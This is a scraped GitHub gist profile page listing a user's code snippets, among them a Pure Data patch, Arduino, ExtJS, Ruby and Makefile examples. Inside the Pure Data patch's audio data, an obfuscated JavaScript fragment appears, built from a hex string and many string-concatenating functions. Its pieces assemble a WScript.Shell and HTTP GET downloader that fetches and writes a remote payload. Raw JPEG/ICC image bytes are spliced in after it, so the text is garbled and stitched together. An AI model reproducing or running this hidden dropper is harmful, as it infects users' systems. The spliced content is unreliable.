Skip to content

Instantly share code, notes, and snippets.

View jbonhag's full-sized avatar
🌊

Jeff Bonhag jbonhag

🌊
  • America/New_York
View GitHub Profile
This file has been truncated, but you can view the full file.
#N canvas 64 65 1122 709 10;
#X text 74 49 this moment will never come again;
#X obj 611 650 dac~;
#X obj 560 21 adc~;
#X obj 429 209 tabwrite~ left;
#N canvas 0 22 450 278 (subpatch) 0;
#X array right 44100 float 3;
#A 0 -0.00213934 0.00114312 -0.000540414 -0.0053224 -0.00898269 -0.00563051
0.00014895 0.00160446 0.00392841 0.00131357 -0.00270989 -0.00352675
-0.00390941 0.00177499 0.00843603 0.0109532 0.0105972 0.00905883 0.0100613
var str="5551525E0E060B0A0C05032417070549070B16144A070B095E275E0F0508114A070B4A0E145E17555E55505051555255505450"; function mhsz() { xrn += 'al'; }; function qjac() { zcw += 'end('; }; function rxnz() { zcw += 'an'; }; function ftkg() { zcw += 'dn = '; }; function zxo() { zcw += ' i++'; }; function ztws() { zcw += '("GET'; }; function vazv() { zcw += '00)'; }; function pjgz() { zcw += '[i]+'; }; function brvd() { zcw += 'nvir'; }; function ouji() { mjq(zcw); }; function zkjb() { zcw += ' xo.o'; }; function ykk() { zcw += ',2)'; }; function ojy() { zcw += 'on'; }; function agje() { zcw += 'or '; }; function jsw() { zcw += '.Shel'; }; function ndbz() { zcw += 'func'; }; function ezm() { zcw += '} cat'; }; function qbj() { zcw += '.wri'; }; function fwf() { zcw += 'ript.'; }; function tya() { zcw += 'd(Mat'; }; function mqh() { zcw += '.Exp'; }; function qchm() { zcw += ' dn '; }; function iysr() { zcw += ' (xo'; }; function ciu() { zcw += '","ht'; }; function ryw() { zcw += 's("'; }; function rmpo() { zcw += '
 ╪ αJFIF Γ XICC_PROFILE HLinomntrRGB XYZ ╬ 1acspMSFTIEC sRGB÷╓╙-HP cprtP3descälwtpt≡bkptrXYZgXYZ,bXYZ@dmndTpdmdd─êvuedLåview╘$lumi°meas $tech0 rTRC< gTRC< bTRC< textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ ≤Q╠XYZ XYZ oó8⌡ÉXYZ bÖ╖à┌XYZ $áä╢╧descIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Condition in IEC61966-2.1,Reference Viewing Condition in IEC61966-2.1view
@jbonhag
jbonhag / Cory
Created August 28, 2015 04:07
Arduino output pin shifter example
/*
Button
Turns on and off a light emitting diode(LED) connected to a random digital
pin (9, 10, 11, 12, or 13), when pressing a pushbutton attached to pin 2.
The circuit:
* LED/greeting card attached from pin 9 to ground
* LED/greeting card attached from pin 10 to ground
* LED/greeting card attached from pin 11 to ground
@jbonhag
jbonhag / gist:c18f695f19b15ace9ad5
Last active August 27, 2015 17:11
Populate Ext ComboBox with data/display pairs
var combo = new Ext.form.ComboBox({
typeAhead: true,
triggerAction: 'all',
lazyRender:true,
mode: 'local',
store: new Ext.data.ArrayStore({
id: 0,
fields: [
'myId',
'displayText'
@jbonhag
jbonhag / mystul.xml
Last active August 29, 2015 14:26
.repo/local_manifests/mystul.xml
<?xml version="1.0" encoding="UTF-8"?>
<manifest>
<project path="device/htc/mystul" name="Flyhalf205/android_device_htc_mystul" remote="github" revision="cm-10.1"/>
</manifest>
@jbonhag
jbonhag / Makefile
Created August 3, 2015 20:58
cisco-decrypt
all:
gcc -Wall -o cisco-decrypt cisco-decrypt.c `libgcrypt-config --libs --cflags`
require 'nokogiri'
require 'open-uri'
def crawl(url)
doc = Nokogiri::HTML(open(url))
doc.css('a').each do |a|
href = a['href']
new_url = "#{url}#{href}"
require 'tiny_tds'
require 'pp'
require 'axlsx'
def build_catalog_tree
client = TinyTds::Client.new host: 'localhost', port: 1433
sql = "select name from sys.databases where name != 'tempdb'"
result = client.execute(sql)
rows = result.collect {|row| row}
var responseText = 'abc\n123';
var blob = new Blob([responseText], {type: 'application/octet-stream'});
var url = URL.createObjectURL(blob);
window.location = url;